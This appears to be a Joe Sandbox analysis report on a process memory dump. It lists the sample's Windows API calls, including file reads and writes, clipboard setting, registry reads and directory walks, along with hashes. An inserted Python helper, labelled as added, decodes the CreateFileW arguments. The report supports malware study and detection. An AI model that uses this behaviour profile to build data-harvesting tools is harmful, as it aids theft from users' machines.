                                                                                                                                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
• Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
• Opcode Fuzzy Hash: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
• Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
• Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
• Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
• Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
• Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
• Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
• Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
Uniqueness

Uniqueness Score: -1.00%
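The two CreateFileW entries above record the stack at the call site as raw hex, which is hard to triage at a glance. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It parses lines in the report's "APIs" bullet format and decodes the CreateFileW access, share and creation-disposition arguments using the Win32 constants from the Windows SDK headers. It assumes (this is an assumption about the report's convention, not something the report states) that the values in parentheses are the stack slots at the call, the first seven being CreateFileW's parameters and the rest being caller data that can be ignored, and that "?" marks a slot the sandbox could not resolve. The sample lines are copied from the entries above.

```python
import re
from typing import Optional

# Win32 constants for CreateFileW, as defined in the Windows SDK headers.
ACCESS_FLAGS = {
    0x10000000: "GENERIC_ALL",
    0x20000000: "GENERIC_EXECUTE",
    0x40000000: "GENERIC_WRITE",
    0x80000000: "GENERIC_READ",
}
SHARE_FLAGS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# One "APIs" bullet from the report: "• Api.Module(slot,slot,...), ref: ADDR"
API_LINE = re.compile(
    r"(?:•\s*)?(?P<api>[^.\s(]+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Copied from the report entries above (CreateFileW) and below (FindClose).
SAMPLE_LINES = [
    "• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,"
    "0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5",
    "• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,"
    "0040E0F1,00000104), ref: 004096EE",
]
FINDCLOSE_LINE = ("• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,"
                  "00000104,?,?,?,?,?,00000104), ref: 0040AEC8")


def parse_arg(token: str):
    """Hex stack slot -> int; '?' -> None (unresolved by the sandbox); other text is kept verbatim."""
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # e.g. a resolved string such as *.* or a symbol such as Function_000148B6


def parse_api_line(line: str) -> Optional[dict]:
    """Split one report bullet into API name, module, call-site address and raw stack slots."""
    m = API_LINE.search(line)
    if not m:
        return None
    return {"api": m["api"], "module": m["mod"], "ref": m["ref"].upper(),
            "stack": [parse_arg(t) for t in m["args"].split(",")]}


def decode_bits(value: int, table: dict) -> list:
    """Name each set bit listed in table; report leftover bits as hex so nothing is silently dropped."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return names


def decode_createfilew(entry: dict) -> Optional[dict]:
    """Map the first seven stack slots onto CreateFileW's parameters (assumed layout, see lead-in)."""
    if entry["api"] != "CreateFileW" or len(entry["stack"]) < 7:
        return None
    name, access, share, _sec_attr, disp, flags_attr, _template = entry["stack"][:7]
    return {
        "ref": entry["ref"],
        "file_name_slot": name,  # a pointer in the live process; not resolved in these lines
        "access": decode_bits(access, ACCESS_FLAGS) if isinstance(access, int) else access,
        "share": decode_bits(share, SHARE_FLAGS) if isinstance(share, int) else share,
        "disposition": DISPOSITIONS.get(disp, hex(disp)) if isinstance(disp, int) else disp,
        "flags_and_attributes": hex(flags_attr) if isinstance(flags_attr, int) else flags_attr,
    }


def decode_report_lines(lines) -> list:
    """Decode every CreateFileW bullet in a list of report lines; other APIs are skipped."""
    out = []
    for line in lines:
        entry = parse_api_line(line)
        if entry is not None:
            decoded = decode_createfilew(entry)
            if decoded is not None:
                out.append(decoded)
    return out


if __name__ == "__main__":
    for call in decode_report_lines(SAMPLE_LINES):
        print(call)
    print(parse_api_line(FINDCLOSE_LINE)["stack"])
```

Read this way, the call at 004096D5 opens an existing file for GENERIC_READ with read/write sharing, and the call at 004096EE uses CREATE_ALWAYS with GENERIC_WRITE, which creates the file or overwrites it if it exists. The slot where lpFileName would sit holds 00000000 and 00000001 rather than a resolved string, so the paths cannot be recovered from these lines alone; the FindClose entry, by contrast, does carry a resolved "*.*" pattern from the enclosing directory walk.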

APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
• Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
• Opcode Fuzzy Hash: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
• Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
• Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
• Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
• Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
• Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
Uniqueness

Uniqueness Score: -1.00%

APIs
• EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
• Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
• Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
• Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
• Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?), ref: 0044DEB6
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
• Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
• Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
• Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
• Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
• Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
• Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                                                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                                                                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                                                                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
• memcpy.MSVCRT ref: 00406942
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??2@FilePointermemcpy
• String ID:
• API String ID: 609303285-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalFix.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnWire.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
• String ID:
• API String ID: 2565263379-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalFix.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT ref: 004098B5
• GlobalUnWire.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
• String ID:
• API String ID: 2014503067-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 004182D7
